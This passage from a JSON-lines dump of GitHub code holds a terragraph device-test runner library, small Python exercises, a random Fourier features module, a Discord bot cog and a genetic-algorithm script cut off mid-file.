self.ctf_api.save_log_file(\n test_exe_id=self.test_exe_id,\n source_file_path=f,\n constructive_path=dest_path,\n )\n if result[\"error\"]:\n success = False\n self.log_to_ctf(result[\"message\"], \"error\")\n if \"error\" in result and result[\"error\"]:\n success = False\n else:\n dest_path = (\n f\"{node_id}/{step}{test_action_result_id}{Path(logfile).parent}\"\n if test_action_result_id\n else f\"{node_id}{Path(logfile).parent}\"\n )\n self.log_to_ctf(f\"Pushing {local_path} to CTF path: {dest_path}\")\n if test_action_result_id:\n result = self.ctf_api.save_action_log_file(\n source_file_path=local_path,\n constructive_path=dest_path,\n test_exe_id=self.test_exe_id,\n test_action_result_id=test_action_result_id,\n )\n else:\n result = self.ctf_api.save_log_file(\n test_exe_id=self.test_exe_id,\n source_file_path=local_path,\n constructive_path=dest_path,\n )\n if result[\"error\"]:\n success = False\n self.log_to_ctf(result[\"message\"], \"error\")\n # Break if log push to ctf fails and store_logs_locally is disabled\n if not 
success and not self.store_logs_locally:\n break\n if not self.store_logs_locally:\n tmp_dir.cleanup()\n\n return success\n\n def log_to_ctf(self, msg: str, severity: Optional[str] = \"debug\") -> None:\n \"\"\"Record a log message for the current thread.\n\n This will queue the log for CTF, as well as log it locally at a given\n logging level (\"debug\", \"info\", \"warning\", \"error\", \"critical\").\n\n These logs are not pushed here; they are typically pushed to CTF during\n test steps in run_test_steps().\n \"\"\"\n\n if self.thread_local.initialized:\n # Test step execution has started.\n # Note: _run_test_step() initializes self.thread_local.step_idx\n step_idx = self.thread_local.step_idx\n else:\n # Test step execution has not started yet.\n # Tag these logs, and lump them in with logs for test step 1,\n # this ensures that they will get pushed to CTF.\n step_idx = 1\n msg = f\"[pre step 1] {msg}\"\n\n timestamped_msg = (\n f\"[{datetime.datetime.now().replace(microsecond=0).isoformat()}] {msg}\"\n )\n\n if step_idx < 1:\n raise ValueError(f\"Invalid step_idx {step_idx}. See ThreadLocal.\")\n\n with self.ctf_log_lock:\n self.ctf_logs.setdefault(step_idx, []).append(timestamped_msg)\n\n # Also log to the console\n if severity:\n log_method = getattr(logger, severity, None)\n if callable(log_method):\n log_method(msg)\n else:\n logger.warning(\n f\"log_to_ctf() invoked with unknown severity: {severity}\"\n )\n\n def ping_output_to_ctf_table(\n self, ping_summary: str, ping_stats: str, from_node_id: int, dest_ip: str\n ) -> None:\n packets_transmitted = re.search(r\"(\\S+) packets transmitted\", ping_summary)\n if packets_transmitted:\n packets_transmitted = packets_transmitted.group(1)\n packets_received = re.search(r\"(\\S+) received\", ping_summary)\n if packets_received:\n packets_received = packets_received.group(1)\n packet_loss = re.search(r\"(\\S+)% packet loss\", ping_summary)\n if packet_loss:\n packet_loss = packet_loss.group(1)\n time = re.search(r\"time (\\S+)ms\", ping_summary)\n if time:\n time = time.group(1)\n\n stats_min = None\n stats_avg = None\n stats_max = None\n stats_mdev = None\n stats_search = re.search(r\"= (\\S+)/(\\S+)/(\\S+)/(\\S+) ms\", ping_stats)\n if stats_search:\n stats_min = stats_search.group(1)\n stats_avg = stats_search.group(2)\n stats_max = stats_search.group(3)\n stats_mdev = stats_search.group(4)\n\n data_list = [\n {\n \"packets transmitted\": packets_transmitted,\n \"packets received\": packets_received,\n \"packet loss %\": packet_loss,\n \"time ms\": time,\n \"min\": stats_min,\n \"avg\": stats_avg,\n \"max\": stats_max,\n \"mdev\": stats_mdev,\n },\n ]\n data_source = f\"Node {from_node_id} to {dest_ip}\"\n json_data = {\n \"data_source\": data_source,\n \"data_list\": data_list,\n }\n\n json_table_summary = {\n \"title\": \"Ping Summary\",\n \"columns\": \"packets transmitted,packets received,packet loss %,time ms\",\n \"data_source_list\": data_source,\n }\n json_table_stats = {\n \"title\": \"Ping Stats\",\n \"columns\": \"min,avg,max,mdev\",\n \"data_source_list\": data_source,\n }\n\n ctf_json_data_all = {\n \"ctf_tables\": [json_table_summary, json_table_stats],\n \"ctf_data\": [json_data],\n }\n self.save_ctf_json_data(ctf_json_data_all)\n\n def save_ctf_json_data(self, json_data: Dict) -> None:\n \"\"\"Record CTF JSON data for the current test step.\n\n This JSON data is not pushed here; they are typically pushed to CTF during\n test steps in run_test_steps().\n \"\"\"\n\n step_idx = self.thread_local.step_idx\n if step_idx < 
1:\n raise ValueError(f\"Invalid step_idx {step_idx}. See ThreadLocal.\")\n\n with self.ctf_json_data_lock:\n self.ctf_json_data[step_idx] = json_data\n\n def save_ctf_test_action_result_with_key(self, key: str, json_object: Dict) -> Dict:\n \"\"\"Record CTF JSON objects for the current test step.\n\n This information is useful to retrieve this test action result in future test runs.\n\n This JSON data is not pushed here; they are typically pushed to CTF during\n test steps in run_test_steps().\n \"\"\"\n\n step_idx = self.thread_local.step_idx\n if step_idx < 1:\n raise ValueError(f\"Invalid step_idx {step_idx}. See ThreadLocal.\")\n\n with self.ctf_keyed_json_objects_lock:\n self.ctf_keyed_json_objects.setdefault(step_idx, []).append(\n {\n \"key\": key,\n \"json_object\": json_object,\n }\n )\n\n def get_ctf_test_action_result_with_key(self, key: str) -> Dict:\n \"\"\"Retrieve CTF JSON object from previous test runs.\"\"\"\n test_action_result_keyed_json = (\n self.ctf_api.get_test_action_result_keyed_json_object(key, self.team_id)\n )\n return test_action_result_keyed_json\n\n def delete_ctf_test_action_result_with_key(self, key: str) -> Dict:\n \"\"\"Delete CTF JSON object from previous test runs.\"\"\"\n with self.ctf_keyed_json_objects_lock:\n self.ctf_api.delete_test_action_result_keyed_json_object(key, self.team_id)\n\n def run_cmd(\n self,\n cmd: str,\n node_ids: Optional[List[int]] = None,\n device_type: str = \"generic\",\n timeout: Optional[int] = None,\n ) -> Dict[Any, int]:\n \"\"\"Run a given command on a list of test devices.\n\n If 'node_ids' is empty, the command will run on all devices of a given\n type.\n\n Returns a map of Future objects to the associated 'node_id'. Typically,\n wait_for_cmds() is invoked on this return value.\n \"\"\"\n futures: Dict = {}\n node_set: Set = set(node_ids or [])\n cmd_timeout: int = timeout if timeout else self.timeout\n\n for node_id, device in self.device_info.items():\n if node_ids:\n if node_id not in node_set:\n continue\n elif device.device_type() != device_type:\n continue\n futures[\n self.thread_pool.submit(\n device.action_custom_command, cmd, cmd_timeout - 1\n )\n ] = node_id\n\n return futures\n\n def wait_for_cmds(\n self, futures: Dict[Any, int], timeout: Optional[int] = None\n ) -> Generator[Dict[str, Any], None, None]:\n \"\"\"Wait for the given commands to finish, after invoking run_cmd().\n\n This yields objects with the following format as each command finishes:\n ```\n {\n \"success\": ,\n \"message\": \"\",\n \"error\": \"\",\n \"node_id\": \n }\n ```\n\n If a connection error is encountered, raises `DeviceCmdError`.\n \"\"\"\n cmd_timeout: int = timeout if timeout else self.timeout\n for future in as_completed(futures.keys(), timeout=cmd_timeout):\n result = future.result()\n node_id = futures[future]\n\n if \"connection_error\" in result and result[\"connection_error\"]:\n raise DeviceCmdError(\n f\"Node {node_id}: Connection failure: {result['message']}\"\n )\n\n yield {\n \"success\": result[\"error\"] == 0 and result[\"returncode\"] == 0,\n \"message\": result[\"message\"],\n \"error\": result[\"error\"] or result[\"stderr\"] or \"\",\n \"node_id\": node_id,\n }\n\n def _thread_main(self, fn, fn_args: Tuple, step_idx: int) -> Any:\n \"\"\"Publish step_idx and execute fn\"\"\"\n self.thread_local.init(step_idx)\n return fn(*fn_args)\n\n def try_until_timeout(\n self, fn, fn_args: Tuple, retry_interval: float, timeout: float\n ) -> None:\n \"\"\"Wrapper for try_until_timeout_noexcept() to generate an exception 
when it fails.\n Raises: Exception when try_until_timeout_noexcept() returns False.\n \"\"\"\n\n success = self.try_until_timeout_noexcept(\n fn=fn, fn_args=fn_args, retry_interval=retry_interval, timeout=timeout\n )\n if not success:\n raise Exception(f\"try_until_timeout {fn.__name__} | timed out\")\n\n def try_until_timeout_noexcept(\n self, fn, fn_args: Tuple, retry_interval: float, timeout: float\n ) -> bool:\n \"\"\"Repeatedly execute `fn` (a function) until it returns a\n truthy value or None, or until the timeout is reached.\n\n `Exception` raised by `fn` during the retries is ignored.\n The actual max timeout is (timeout + 6 * retry_interval)\n\n Returns: True if `fn` ran successfully\n Raises : nothing\n \"\"\"\n time_left = float(timeout)\n start_time = time.monotonic()\n end_time = start_time + time_left\n while True:\n try:\n future = next(\n as_completed(\n [\n self.thread_pool.submit(\n self._thread_main,\n fn,\n fn_args,\n self.thread_local.step_idx,\n )\n ],\n timeout=time_left,\n )\n )\n ret = future.result()\n if type(ret) is dict:\n success = \"error\" not in ret or str(ret[\"error\"]) == \"0\"\n else:\n success = ret is None or bool(ret)\n if success:\n return True\n except TimeoutError as e:\n self.log_to_ctf(\n f\"try_until_timeout {fn.__name__} | caught {str(e)}\", \"error\"\n )\n return False\n except Exception:\n pass\n\n now = time.monotonic()\n if now > end_time:\n self.log_to_ctf(f\"try_until_timeout {fn.__name__} | timed out\", \"error\")\n return False\n\n elapsed = now - start_time\n self.log_to_ctf(\n f\"try_until_timeout {fn.__name__} | elapsed {elapsed} | retrying in {retry_interval}\"\n )\n time_left = max(timeout - elapsed, 5.0 * retry_interval)\n time.sleep(retry_interval)\n return False\n\n def _test_can_connect(self, connection: SSHConnection) -> bool:\n \"\"\"Try to connect/disconnect a test device.\n\n Return: True if connect/disconnect are both successful.\n\n Note that threads can only disconnect SSHConnection's that\n they established. See ThreadSafeSshConnection in CTF for\n more details.\n \"\"\"\n result = connection.connect()\n if result[\"error\"] != 0:\n return False\n result = connection.disconnect()\n if \"error\" in result and result[\"error\"] != 0:\n logger.error(\n f'_test_can_connect | disconnect failed | f{result[\"message\"]}'\n )\n return False\n return True\n\n def test_can_connect(\n self,\n node_id: int,\n retry_interval: int,\n timeout: int,\n step_idx: Optional[int] = None,\n ) -> bool:\n \"\"\"Repeatedly attempt connect/disconnect to a test device\n\n Return: True if connect/disconnect are both successful\n \"\"\"\n\n if step_idx:\n # We are in a new thread. Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n device = self.device_info[node_id]\n return self.try_until_timeout_noexcept(\n fn=self._test_can_connect,\n fn_args=(device.connection,),\n retry_interval=retry_interval,\n timeout=timeout,\n )\n\n # TODO This should replace fetch_file, and not reconnect between transfers.\n def fetch_files(\n self,\n node_id: int,\n connection: SSHConnection,\n files: List[str],\n local_tmp_dir: str,\n step_idx: Optional[int] = None,\n ) -> bool:\n \"\"\"Collect the requested files locally\n This will collect files to local_tmp_dir. The local_tmp_dir will be managed by the caller\n \"\"\"\n\n if step_idx:\n # We are in a new thread. 
Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n success: bool = True\n logger.info(\n f\"Fetching {files} from node {node_id} to local dir {local_tmp_dir}\"\n )\n\n for file in files:\n # Fetch file from test device\n self.log_to_ctf(f\"Fetching {file} to local dir: {local_tmp_dir}\")\n if not self.fetch_file(connection, local_tmp_dir, file, recursive=True):\n success = False\n\n return success\n\n def fetch_file(\n self,\n connection: SSHConnection,\n local_path: str,\n remote_path: str,\n recursive: bool = True,\n ) -> bool:\n \"\"\"Fetch a file or directory from a test device, and return True upon\n success.\n\n The connection object must be initialized before calling this function.\n \"\"\"\n connection.connect(timeout=self.scp_timeout)\n result: Dict = connection.copy_files_from_remote(\n local_path, remote_path, recursive\n )\n connection.disconnect()\n if result[\"error\"]:\n self.log_to_ctf(\n f\"Failed to fetch remote file '{remote_path}' to '{local_path}': \"\n + f\"{result['message']}\",\n \"error\",\n )\n return False\n return True\n\n def push_file(\n self,\n connection: SSHConnection,\n local_path: str,\n remote_path: str,\n recursive: bool = True,\n step_idx: Optional[int] = None,\n ) -> bool:\n \"\"\"Push a file or directory to a test device, and return True upon\n success.\n\n The connection object must be initialized before calling this function.\n \"\"\"\n\n if step_idx:\n # We are in a new thread. Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n connection.connect(timeout=self.scp_timeout)\n result: Dict = connection.copy_files_to_remote(\n local_path, remote_path, recursive\n )\n connection.disconnect()\n\n if result[\"error\"]:\n self.log_to_ctf(\n f\"Failed to push local file '{local_path}' to remote path \"\n + f\"'{remote_path}': {result['message']}\",\n \"error\",\n )\n return False\n return True\n\n def push_json_file(\n self, connection: SSHConnection, obj: Dict, remote_path: str\n ) -> bool:\n \"\"\"Push a dictionary as a JSON file to a test device, and return\n True upon success.\n\n The connection object must be initialized before calling this function.\n \"\"\"\n with NamedTemporaryFile(mode=\"w\", delete=False) as ntf:\n ntf_path = Path(ntf.name)\n json.dump(obj, ntf, indent=2, sort_keys=True)\n\n success: bool = False\n try:\n success = self.push_file(\n connection, str(ntf_path), remote_path, recursive=False\n )\n except Exception as e:\n logger.error(f\"{type(e).__name__} - SCP failed: {str(e)}\")\n raise\n finally:\n ntf_path.unlink()\n\n return success\n\n def copy_files_parallel(\n self,\n local_file_path: str,\n remote_file_path: str,\n node_ids: Optional[List[int]] = None,\n ) -> None:\n \"\"\"Copy files/directories to test nodes.\"\"\"\n if not (local_file_path and remote_file_path):\n raise TestUsageError(\"Empty local or remote file paths\")\n\n futures: Dict = {}\n for node_id, device in self.device_info.items():\n if node_ids and node_id not in node_ids:\n continue\n\n self.log_to_ctf(\n f\"Node {node_id}: Copying file from {local_file_path}\"\n + f\" to node: {remote_file_path}\",\n \"info\",\n )\n futures[\n self.thread_pool.submit(\n self.push_file,\n device.connection,\n local_file_path,\n remote_file_path,\n step_idx=self.thread_local.step_idx,\n )\n ] = node_id\n\n for future in as_completed(futures.keys(), timeout=self.scp_timeout):\n result = future.result()\n node_id = futures[future]\n if result:\n self.log_to_ctf(f\"Node 
{node_id} finished copying files\", \"info\")\n else:\n raise DeviceCmdError(f\"Failed to copy files to node {node_id}\")\n\n @classmethod\n def merge_dict(cls, a: Dict, b: Dict) -> None:\n \"\"\"Recursively merge dictionary 'b' into 'a' in-place.\"\"\"\n for k in b.keys():\n if k in a and isinstance(a[k], dict) and isinstance(b[k], Mapping):\n cls.merge_dict(a[k], b[k])\n else:\n a[k] = b[k]\n\n @classmethod\n def merge_dict_of_lists(cls, a: Dict[Any, List], b: Dict[Any, List]) -> None:\n \"\"\"merge List values of dictionary 'b' into 'a' in-place with unique records\"\"\"\n for k, v in b.items():\n if k in a:\n a[k].extend(v)\n a[k] = list(set(a[k]))\n else:\n a[k] = v\n\n def _load_nodes_data(self, nodes_data_file: str) -> Dict:\n \"\"\"Load a node data file from disk and merge overrides on top.\"\"\"\n # Load node data JSON\n nodes_data: Dict = {}\n if nodes_data_file:\n with open(nodes_data_file) as f:\n logger.info(f\"Loading node data: {nodes_data_file}\")\n nodes_data = json.load(f)\n else:\n self.log_to_ctf(\"No node data file provided\")\n\n device_count = max(len(nodes_data), len(self.device_info))\n\n # Convert string node_ids into integers (JSON only allows string keys)\n nodes_data = {int(key): value for key, value in nodes_data.items()}\n\n # Merge overrides\n self.merge_dict(nodes_data, self.nodes_data_amend(device_count))\n\n # Merge any config overrides from test_args\n self.nodes_data_amend_test_args(nodes_data, device_count)\n\n logger.debug(f\"Using node data ({device_count} devices): {nodes_data}\")\n return nodes_data\n\n def read_nodes_data(self, path, required: bool = True) -> Any:\n \"\"\"Read a value from `self.nodes_data` given a key path.\n\n If a null value is encountered, raises DeviceConfigError if `required`\n is True, otherwise returns None.\n \"\"\"\n d = self.nodes_data\n for k in path:\n if k not in d:\n if required:\n path_str = \".\".join(str(x) for x in path)\n raise DeviceConfigError(\n f\"Required fields are missing from node data: '{path_str}'\"\n )\n else:\n return None\n d = d[k]\n return d\n\n def nodes_data_amend(self, num_nodes: int) -> Dict:\n \"\"\"Get test/setup specific amendments to merge into `self.nodes_data`.\n The amendments have identical structure to `self.nodes_data`\n \"\"\"\n return {}\n\n def nodes_data_amend_test_args(self, nodes_data: Dict, num_nodes: int) -> Dict:\n \"\"\"Get amendments to nodes_data from test_args.\"\"\"\n return nodes_data\n\n @contextmanager\n def _test_manager(self):\n \"\"\"\n Function for intiation and cleanup of test-specific resources\n Sets up a file logging handler so that all logger logs can be accessed at the end of the test run.\n Calls the save_total_logs after test execution is complete\n\n Clears the thread_local vattribute for the next test execution.\n \"\"\"\n with TemporaryDirectory(prefix=\"ctf_\") as templog_dir:\n self.templog_path = path.join(templog_dir, TOTAL_LOGS_FILE_NAME)\n # Add a file handler to the root logger pointing to the templog_path we just created\n root_logger = logging.getLogger()\n file_handler = self._get_log_file_handler(self.templog_path)\n root_logger.addHandler(file_handler)\n # yield the contextmanager\n yield templog_dir\n # will be called on context manager's __exit__\n self.save_total_logs()\n # remove the handler so the next test run (in the event of a test suite) will only use its new handler\n root_logger.removeHandler(file_handler)\n # NamedTemporaryFile's exit is called now and the log file is deleted\n\n # All steps (in all threads) are done - set 
class ThreadLocal variable 'initialized' to False.\n # This is mostly important for TestSuites where the next test iteration will make use\n # of the class variable and will expect it to not be intialized yet\n self.thread_local.clear()\n\n def save_total_logs(self):\n \"\"\"Save the logger output from the test's duration\"\"\"\n return self.ctf_api.save_total_logs_file(\n source_file_path=self.templog_path,\n constructive_path=TOTAL_LOGS_DIR_NAME,\n test_exe_id=self.test_exe_id,\n )\n\n def _get_log_file_handler(self, log_file_path):\n file_handler = logging.FileHandler(log_file_path)\n file_handler.setFormatter(\n logging.Formatter(\n \"[%(asctime)s] %(levelname)s: %(message)s (%(filename)s:%(lineno)d)\"\n )\n )\n return file_handler\n\n\nclass CtfHelpers:\n \"\"\"CTF API wrappers.\"\"\"\n\n def __init__(self, args: Namespace) -> None:\n # CTF run mode flag. Running in serverless mode or CTF server APIs\n self.serverless = (\n False if not args.serverless else bool(strtobool(args.serverless))\n )\n logger.info(f\"Running in serverless mode = {self.serverless}\")\n\n # Run with or without ctf server\n self.ctf_api = get_ctf_api(serverless=self.serverless)\n\n # Configure serverless variables\n if self.serverless:\n self.ctf_api.set_serverless_config()\n\n def list_test_setups(self, team_id: int) -> List[Any]:\n return cast(List[Any], self.ctf_api.get_list_of_user_team_test_setups(team_id))\n\n def force_free_test_setup(self, test_setup_id: int) -> bool:\n if self.ctf_api.check_if_test_setup_is_free(test_setup_id):\n return True\n else:\n return bool(self.ctf_api.set_test_setup_and_devices_free(test_setup_id))\n\n\nif __name__ == \"__main__\":\n logger.error(\"Do not run directly\")\n","repo_name":"terragraph/terragraph-ctf","sub_path":"ctf/ctf_client/runner/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":65602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22606468680","text":"def create_an_acronym(nimi):\n sanat = nimi.split()\n kirjaimet = []\n for sana in sanat:\n kirjain = sana[0]\n kirjain = kirjain.upper()\n kirjaimet.append(kirjain)\n akronyymi = \"\"\n for kirjain in kirjaimet:\n akronyymi += kirjain\n return akronyymi\n","repo_name":"kkemppi/TIE-courses","sub_path":"Ohjelmointi 1/Ohjelmointi 1/alle 7. 
krs/akronyymi.py","file_name":"akronyymi.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43688934875","text":"\"\"\"\nCommon functions/classes for the other classes.\nAll classes except 'seed' function is not visible from users.\n\"\"\"\n\nimport functools\n\nimport numpy as np\nimport scipy.stats\n\n\ndef seed(seed):\n \"\"\"\n Fix random seed used in this script.\n\n Args:\n seed (int): Random seed.\n \"\"\"\n # Now it is enough to fix the random seed of Numpy.\n np.random.seed(seed)\n\n\ndef get_rff_matrix(dim_in, dim_out, std):\n \"\"\"\n Generates random matrix of random Fourier features.\n\n Args:\n dim_in (int) : Input dimension of the random matrix.\n dim_out (int) : Output dimension of the random matrix.\n std (float): Standard deviation of the random matrix.\n\n Returns:\n (np.ndarray): Random matrix with shape (dim_out, dim_in).\n \"\"\"\n return std * np.random.randn(dim_in, dim_out)\n\n\ndef get_orf_matrix(dim_in, dim_out, std):\n \"\"\"\n Generates random matrix of orthogonal random features.\n\n Args:\n dim_in (int) : Input dimension of the random matrix.\n dim_out (int) : Output dimension of the random matrix.\n std (float): Standard deviation of the random matrix.\n\n Returns:\n (np.ndarray): Random matrix with shape (dim_out, dim_in).\n \"\"\"\n # Initialize matrix W.\n W = None\n\n for _ in range(dim_out // dim_in + 1):\n s = scipy.stats.chi.rvs(df = dim_in, size = (dim_in, ))\n Q = np.linalg.qr(np.random.randn(dim_in, dim_in))[0]\n V = std * np.dot(np.diag(s), Q)\n W = V if W is None else np.concatenate([W, V], axis = 1)\n\n # Trim unnecessary part.\n return W[:dim_in, :dim_out]\n\n\ndef get_qrf_matrix(dim_in, dim_out, std):\n \"\"\"\n Generates random matrix for quasi-random Fourier features.\n\n Args:\n dim_in (int) : Input dimension of the quasi-random matrix.\n dim_out (int) : Output dimension of the quasi-random matrix.\n std (float): Standard deviation of the quasi-random matrix.\n\n Returns:\n (np.ndarray): Quasi-random matrix with shape (dim_out, dim_in).\n \"\"\"\n # Parameters for quasi random numbers generation.\n QUASI_MC_SKIP = 1000\n QUASI_MC_LEAP = 100\n\n # Implementation of Box-Muller method for converting\n # uniform random sequence to normal random sequence.\n def box_muller_method(xs, ys):\n zs1 = np.sqrt(-2 * np.log(xs)) * np.cos(2 * np.pi * ys)\n zs2 = np.sqrt(-2 * np.log(xs)) * np.sin(2 * np.pi * ys)\n return np.array([zs1, zs2])\n\n # PyTorch is necessary for quasi-random numbers.\n import torch\n\n # Generate sobol sequence engine and throw away the first several values.\n sobol = torch.quasirandom.SobolEngine(dim_in, scramble = True)\n sobol.fast_forward(QUASI_MC_SKIP)\n\n # Generate uniform random matrix.\n W = np.zeros((dim_in, dim_out))\n for index in range(dim_out):\n W[:, index] = sobol.draw(1).numpy()\n sobol.fast_forward(QUASI_MC_LEAP)\n\n # Convert the uniform random matrix to normal random matrix.\n for index in range(0, dim_out, 2):\n W[:, index:index+2] = box_muller_method(W[:, index], W[:, index+1]).T\n\n return std * W\n\n\ndef get_matrix_generator(rand_type, std, dim_kernel):\n \"\"\"\n This function returns a function which generate RFF/ORF matrix.\n The usage of the returned value of this function are:\n f(dim_input:int) -> np.array with shape (dim_input, dim_kernel)\n \"\"\"\n if rand_type == \"rff\": return functools.partial(get_rff_matrix, std = std, dim_out = dim_kernel)\n elif rand_type == \"orf\": return 
functools.partial(get_orf_matrix, std = std, dim_out = dim_kernel)\n elif rand_type == \"qrf\": return functools.partial(get_qrf_matrix, std = std, dim_out = dim_kernel)\n else : raise RuntimeError(\"matrix_generator: 'rand_type' must be 'rff', 'orf', or 'qrf'.\")\n\n\nclass Base:\n \"\"\"\n Base class of the following RFF/ORF related classes.\n \"\"\"\n def __init__(self, rand_type, dim_kernel, std_kernel, W, b):\n \"\"\"\n Constractor of the Base class.\n Create random matrix generator and random matrix instance.\n\n Args:\n rand_type (str) : Type of random matrix (\"rff\", \"orf\", \"qrf\", etc).\n dim_kernel (int) : Dimension of the random matrix.\n std_kernel (float) : Standard deviation of the random matrix.\n W (np.ndarray): Random matrix for the input `X`. If None then generated automatically.\n b (np.ndarray): Random bias for the input `X`. If None then generated automatically.\n\n Notes:\n If `W` is None then the appropriate matrix will be set just before the training.\n \"\"\"\n self.dim = dim_kernel\n self.s_k = std_kernel\n self.mat = get_matrix_generator(rand_type, std_kernel, dim_kernel)\n self.W = W\n self.b = b\n\n def conv(self, X, index=None):\n \"\"\"\n Applies random matrix to the given input vectors `X` and create feature vectors.\n\n Args:\n X (np.ndarray): Input matrix with shape (n_samples, n_features).\n index (int) : Index of the random matrix. This value should be specified only\n when multiple random matrices are used.\n\n Notes:\n This function can manipulate multiple random matrix. If argument 'index' is given,\n then use self.W[index] as a random matrix, otherwise use self.W itself.\n Also, computation of `ts` is equivarent with ts = X @ W, however, for reducing memory \n consumption, split X to smaller matrices and concatenate after multiplication wit W.\n \"\"\"\n W = self.W if index is None else self.W[index]\n b = self.b if index is None else self.b[index]\n return np.cos(X @ W + b)\n\n def set_weight(self, dim_in):\n \"\"\"\n Set the appropriate random matrix to 'self.W' if 'self.W' is None (i.e. empty).\n\n Args:\n dim_in (int): Input dimension of the random matrix.\n\n Notes:\n This function can manipulate multiple random matrix. 
If argument 'dim_in' is\n a list/tuple of integers, then generate multiple random matrixes.\n \"\"\"\n # Generate matrix W.\n if self.W is not None : pass\n elif hasattr(dim_in, \"__iter__\"): self.W = tuple([self.mat(d) for d in dim_in])\n else : self.W = self.mat(dim_in)\n\n # Generate vector b.\n if self.b is not None : pass\n elif hasattr(dim_in, \"__iter__\"): self.b = tuple([np.random.uniform(0, 2*np.pi, size=self.W.shape[1]) for _ in dim_in])\n else : self.b = np.random.uniform(0, 2*np.pi, size=self.W.shape[1])\n\n\n# Author: Tetsuya Ishikawa \n# vim: expandtab tabstop=4 shiftwidth=4 fdm=marker\n","repo_name":"tiskw/random-fourier-features","sub_path":"rfflearn/cpu/rfflearn_cpu_common.py","file_name":"rfflearn_cpu_common.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"76"} +{"seq_id":"32351233087","text":"import disnake\nfrom disnake.ext import commands\nfrom yadps.config.data import Data\nimport yaml\n\n\nclass Resource(commands.Cog):\n data = Data()\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n pass\n\n @commands.slash_command(\n description=\"Send a link in resources channel, will be verified by mods first.\",\n )\n @commands.has_any_role(\n data.memberRoleId\n )\n @commands.cooldown(1, 15*30, commands.BucketType.guild)\n async def resource(self, inter: disnake.ApplicationCommandInteraction, link: str, subject: str):\n embed = disnake.Embed(\n title=inter.author,\n description=f\"Link: {link}\\nSubject: {subject}\\nDate: {inter.created_at.strftime('%d-%m-%y')}\\nTime: {inter.created_at.strftime('%H:%M %p')}\"\n )\n channel = await self.bot.fetch_channel(956780367694659589)\n await channel.send(embed=embed)\n # await inter.send(embed=embed)\n embed = disnake.Embed(\n title=\"Submitted\",\n description=\"Thanks for submitting a resource! 
It will be posted in the resources channel after being approved.\"\n )\n await inter.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Resource(bot))\n","repo_name":"pritam42069/yadps-chan","sub_path":"src/yadps/commands/cogs/user/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"41134284837","text":"# https://codeup.kr/problem.php?id=1902\n# 문제 : 정수 n이 주어질 때, 반복문을 사용하지 않고 정수 n부터 1까지 출력하는 재귀함수 설계하기\n\nn = int(input())\n\ndef recursive(num):\n print(num)\n if num > 1:\n recursive(num - 1)\n \nrecursive(n)\n\n# Test Case.\n# 입력 : 10\n# < 출력 >\n# 10\n# 9\n# 8\n# 7\n# 6\n# 5\n# 4\n# 3\n# 2\n# 1","repo_name":"donggrii/python-coding-test","sub_path":"CodeUp/재귀함수/1902_1부터 n까지 역순으로 출력하기.py","file_name":"1902_1부터 n까지 역순으로 출력하기.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8396255920","text":"#Programa: cooperativa_ga_CSV.py\n#Autor: Oclair Prado em mar/2020\n\n# -*- coding: utf-8 -*-\nimport csv,sys\nfrom random import uniform, randint\nimport numpy as np\nimport pandas as pd\nimport time\n\n\nclass Candidate:\n np_dna = np.array([])\n hour = 0 #Restriction\n milk = 0 #Restriction\n profit = 0 #Benefit\n fitness = 0 \n\n def get_hour( self ): \n return self.hour\n\n def get_milk( self ): \n return self.milk\n\n def get_profit( self ): \n return self.profit\n\n def get_fitness( self ):\n return self.fitness\n\n def fitness_evaluation( self, milk_limit, hour_limit, prod_list ):\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n self.hour = np.sum( self.np_dna * prod_list.np_hours_list )\n self.milk = np.sum( self.np_dna * prod_list.np_milk_list )\n self.profit = np.sum( self.np_dna * prod_list.np_profit_list )\n milk_step = milk_limit - self.milk\n if milk_step < 0:\n milk_step = -10 * milk_step\n \n hour_step = hour_limit - self.hour\n if hour_step < 0:\n hour_step = -10 * hour_step\n\n self.fitness = self.profit - milk_step - hour_step\n \n\n def __init__( self, milk_limit, hour_limit, prod_list ):\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n dna = []\n tot = len( prod_list.np_hours_list )\n lots_limit = 1 #Mais comum seria usar 1\n\n for pos in range( 0, tot ):\n dna.append( randint( 0, lots_limit ) )\n\n np_dna_new = np.array( dna )\n self.np_dna = np_dna_new\n self.fitness_evaluation( milk_limit, hour_limit, prod_list )\n\n \n\nclass ProductsList:\n np_products_list = np.array( [] ) #Produtcs\n np_milk_list = np.array( [] ) #Restriction\n np_hours_list = np.array( [] ) #Restriction\n np_profit_list = np.array( [] ) #Benefit\n np_selected_products = np.array( [] )\n\n\n def set_selected_products( self, candidate ):\n if candidate is None:\n raise ValueError\n\n self.np_selected_products = candidate.np_dna\n\n\n def get_selected_products( self ):\n response = {}\n #| Prod | Qtd | Milk | Hour | Profit |\n acum_milk = 0\n acum_hours = 0\n acum_profit = 0\n\n column_product_name = \"Produto\"\n column_product = []\n column_qtd_name = \"Qtd\"\n column_qtd = []\n column_milk_name = \"Leite\"\n column_milk = []\n column_hour_name = \"Hora\"\n column_hour = []\n column_profit_name = \"Margem\"\n column_profit = []\n \n qtd = self.np_selected_products.shape[0]\n for pos in range( 0, qtd ):\n if 
